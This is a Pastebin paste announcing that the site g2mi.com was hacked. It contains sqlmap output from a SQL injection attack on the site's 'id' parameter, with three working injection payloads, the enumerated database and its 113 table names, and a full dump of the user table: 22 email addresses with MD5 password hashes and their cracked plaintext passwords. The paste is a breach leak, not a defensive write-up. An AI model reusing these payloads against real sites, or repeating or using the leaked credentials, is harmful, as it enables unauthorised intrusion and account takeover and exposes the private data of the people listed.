API tools faq
paste
Lifted

g2mi.com Hacked

Lifted
Dec 25th, 2014
303
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.53 KB | None | 0 0
raw download clone embed print report
  1. /\ /\
  2. { `---' }
  3. { O O }
  4. ~~> V <~~
  5. \ \|/ /
  6. `-----'____
  7. / \ \_
  8. { }\ )_\_ _
  9. | \_/ |/ / \_\_/ )
  10. \__/ /(_/ \__/
  11. (__/
  12. Jasmine
  13. -----------------------------------------------
  14. http://g2mi.com/static.php?id=11
  15. -----------------------------------------------
  16. Place: GET
  17. Parameter: id
  18. Type: boolean-based blind
  19. Title: AND boolean-based blind - WHERE or HAVING clause
  20. Payload: id=11' AND 7731=7731 AND 'VmLN'='VmLN
  21.  
  22. Type: UNION query
  23. Title: MySQL UNION query (NULL) - 1 column
  24. Payload: id=-3664' UNION ALL SELECT CONCAT(0x7165676f71,0x655248564f6174594d4d,0x7177656471)#
  25.  
  26. Type: AND/OR time-based blind
  27. Title: MySQL > 5.0.11 AND time-based blind
  28. Payload: id=11' AND SLEEP(5) AND 'OFLo'='OFLo
  29. ---
  30. [23:49:59] [INFO] the back-end DBMS is MySQL
  31. web application technology: Apache, PHP 5.4.35
  32. back-end DBMS: MySQL 5.0.11
  33. [23:49:59] [INFO] fetching database names
  34. [23:50:00] [INFO] the SQL query used returns 2 entries
  35. [23:50:01] [INFO] retrieved: "information_schema"
  36. [23:50:02] [INFO] retrieved: "db240960196"
  37. available databases [2]:
  38. [*] db240960196
  39. [*] information_schema
  40. -------------------------------------------------
  41.  
  42. Database: db240960196
  43. [113 tables]
  44. +----------------------------+
  45. | tblAccessControl |
  46. | tblAccessProductPackage |
  47. | tblActivities |
  48. | tblActivities_web |
  49. | tblActivitiesl1 |
  50. | tblActivitySector |
  51. | tblAdvertisement |
  52. | tblAdvertisementCategory |
  53. | tblAgentAccessControl |
  54. | tblAgents |
  55. | tblAssignments |
  56. | tblAuthor |
  57. | tblCategory |
  58. | tblCompany |
  59. | tblCompanyOwnership |
  60. | tblCompanyOwnership_web |
  61. | tblCompanyOwnershipl1 |
  62. | tblCompanyRegistration |
  63. | tblCompanyStaff |
  64. | tblCompanyStaff_web |
  65. | tblCompanyStaffl1 |
  66. | tblCompanyType |
  67. | tblCompany_web |
  68. | tblCompany_web1 |
  69. | tblCompanyl1 |
  70. | tblCountry |
  71. | tblCountryRegion |
  72. | tblCurrencies |
  73. | tblCustomer |
  74. | tblDataType |
  75. | tblDescription |
  76. | tblDescription_web |
  77. | tblDescriptionl1 |
  78. | tblDesignation |
  79. | tblDocumentType |
  80. | tblDocuments |
  81. | tblDocuments_web |
  82. | tblDocumentsl1 |
  83. | tblEntityData |
  84. | tblEntityData_30_july_2013 |
  85. | tblEntityFinancial |
  86. | tblEntityType |
  87. | tblFeaturedCompany |
  88. | tblFooterPages |
  89. | tblFormat |
  90. | tblGeography |
  91. | tblGeography_web |
  92. | tblGeographyl1 |
  93. | tblGroupFinancial |
  94. | tblGroupFinancial_web |
  95. | tblGroupFinanciall1 |
  96. | tblHelpText |
  97. | tblHomePageNews |
  98. | tblIcon |
  99. | tblIntrimFinancials |
  100. | tblInvestmentActivity |
  101. | tblInvestmentActivityType |
  102. | tblInvestmentActivity_web |
  103. | tblInvestmentActivityl1 |
  104. | tblItemDetails |
  105. | tblItemType |
  106. | tblLastFullYearTag |
  107. | tblMEDCategory |
  108. | tblMEDLibrary |
  109. | tblMajorPlayers |
  110. | tblMajorPlayers_web |
  111. | tblMajorPlayersl1 |
  112. | tblMediaLibrary |
  113. | tblMenu |
  114. | tblNewsLetter |
  115. | tblPrimaryStockExchange |
  116. | tblPriority |
  117. | tblProduct |
  118. | tblProductPackage |
  119. | tblProfit |
  120. | tblProfit_web |
  121. | tblProfitl1 |
  122. | tblProgress |
  123. | tblRegion |
  124. | tblReportType |
  125. | tblRevenue |
  126. | tblRevenue_web |
  127. | tblRevenuel1 |
  128. | tblRole |
  129. | tblSector |
  130. | tblSectorStructure |
  131. | tblSectorStructure_web |
  132. | tblSectorStructurel1 |
  133. | tblSectorValue |
  134. | tblSectorValue_web |
  135. | tblSectorValuel1 |
  136. | tblSectorVolume |
  137. | tblSectorVolume_web |
  138. | tblSectorVolumel1 |
  139. | tblSize |
  140. | tblSize_web |
  141. | tblSizel1 |
  142. | tblStaticPages |
  143. | tblStaticType |
  144. | tblStatic_Content |
  145. | tblSyncLog |
  146. | tblTimePeriod |
  147. | tblTransactionData |
  148. | tblTransactionHistory |
  149. | tblTransactionHistory_web |
  150. | tblTransactionHistoryl1 |
  151. | tblUoM |
  152. | tblUser |
  153. | tblUserLog |
  154. | tblVolume |
  155. | tblYears |
  156. | tbl_country_sector_details |
  157. | tblstate |
  158. +----------------------------+
  159.  
  160. Database: db240960196
  161. Table: tblUser
  162. [5 columns]
  163. +-----------+---------------+
  164. | Column | Type |
  165. +-----------+---------------+
  166. | createdOn | datetime |
  167. | password | varchar(100) |
  168. | Status | enum('Y','N') |
  169. | type | varchar(100) |
  170. | userName | varchar(255) |
  171. +-----------+---------------+
  172.  
  173. Database: db240960196
  174. Table: tblUser
  175. [22 entries]
  176. +---------+---------------------------+----------------------------------+
  177. | type | userName | password |
  178. +---------+---------------------------+----------------------------------+
  179. | <blank> | amitsoni@aohost.net | 5ebe2294ecd0e0f08eab7690d2a6ee69 |--> secret
  180. | <blank> | amitsoni@fortunespace.com | 5ebe2294ecd0e0f08eab7690d2a6ee69 |--> secret
  181. | <blank> | ashish@aohost.net | 6ef422ab1fb100b52703fb7499bf2a59 |--> 83aa
  182. | <blank> | harjinder@heernet.com | d4f7a71af8d127416eee27d405e6e9dc |--> a34f
  183. | <blank> | hsinghheer@yahoo.co.uk | 64322cd9864b443cb6c1768b10043f39 |--> 07d3
  184. | <blank> | HarjinderS@aa.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
  185. | <blank> | careers@heernet.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
  186. | <blank> | rfsdtferrt@dd.com | ece926d8c0356205276a45266d361161 |--> ffff
  187. | <blank> | lijkh@ii.com | 2d7acadf10224ffdabeab505970a8934 |--> pppp
  188. | <blank> | indi@gg.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
  189. | <blank> | qqq@ss.com | 3bad6af0fa4b8b330d162e19938ee981 |--> qqqq
  190. | <blank> | bf@bf.com | d0970714757783e6cf17b26fb8e2298f |--> 112233
  191. | <blank> | ohoi@,hhb.com | 827ccb0eea8a706c4c34a16891f84e7b |--> 12345
  192. | <blank> | hsin@yahoo.co.uk | a722c63db8ec8625af6cf71cb8c2d939 |--> pass1
  193. | <blank> | manveers@hotmail.co.uk | 3c60653280e25c1ba1bd7e06320175e4 |--> redwater12
  194. | <blank> | amitsoni9999@gmail.com | 5ebe2294ecd0e0f08eab7690d2a6ee69 |--> secret
  195. | <blank> | rajat@heernet.com | f4fe0ab8774652e770fe5a4fd0869248 |--> 14e1
  196. | <blank> | test@hg.com | 1a1dc91c907325c69271ddf0c944bc72 |--> pass
  197. | <blank> | raj@ajay.com | 79cfac6387e0d582f83a29a04d0bcdc4 |--> kumar
  198. | <blank> | heernet1@gmail.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
  199. | <blank> | poof1@gmail.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
  200. | <blank> | heernettest1@gmail.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
  201. +---------+---------------------------+----------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!